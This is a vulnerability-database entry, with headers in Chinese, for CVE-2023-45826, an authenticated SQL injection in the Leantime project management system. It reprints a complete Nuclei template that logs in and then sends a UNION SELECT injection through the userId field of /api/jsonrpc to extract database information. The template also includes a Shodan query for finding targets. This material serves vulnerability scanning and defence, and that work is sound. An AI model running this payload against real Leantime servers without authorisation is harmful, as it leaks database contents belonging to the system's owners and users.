CVE-2023-45826: Leantime < 2.4 - Authenticated SQL Injection

日期: 2025-08-01 | 影响软件: Leantime | POC: 已公开

漏洞描述

Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.

PoC代码[已公开]

id: CVE-2023-45826

info:
  name: Leantime < 2.4 - Authenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Leantime is an open source project management system. A 'userId' variable in `app/domain/files/repositories/class.files.php` is not parameterized. An authenticated attacker can send a carefully crafted POST request to `/api/jsonrpc` to exploit an SQL injection vulnerability. Confidentiality is impacted as it allows for dumping information from the database. This issue has been addressed in version 2.4-beta-4. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-c39w-3pjx-qc7m
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-45826
    cwe-id: CWE-89
    epss-score: 0.24206
    epss-percentile: 0.95882
    cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: leantime
    product: leantime
    shodan-query: title:"Leantime"
  tags: cve,cve2023,leantime,authenticated,sqli

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr}}"
  hex_marker: "{{hex_encode(marker)}}"

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: keep-alive

        redirectUrl=http%253A%252F%252Fpdt.re%253A8080%252Fdashboard%252Fhome&username={{username}}&password={{password}}&login=Login

    matchers:
      - type: word
        part: body
        words:
          - /dashboard/home

  - raw:
      - |
        POST /api/jsonrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"method": "leantime.rpc.files.getFilesByModule","jsonrpc": "2.0","id": "1","params": {"userId":"9 union select concat(0x{{hex_marker}},0x3a,user()),2,3,4,5,6,7,8,9,10,11-- -" } }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request was successful'
          - "{{marker}}"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        internal: false
        regex:
          - '"\w+:(.*?)\"'
        group: 1
# digest: 4b0a0048304602210081d1e13688500956875711cb4428557133b41a6f7f469cf93b2dad396e99a592022100b804b22050881ee6e3f7afde35c9a1c63ec16c0f40aba4a9db690c701fa1db3e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-45826.yaml

相关漏洞推荐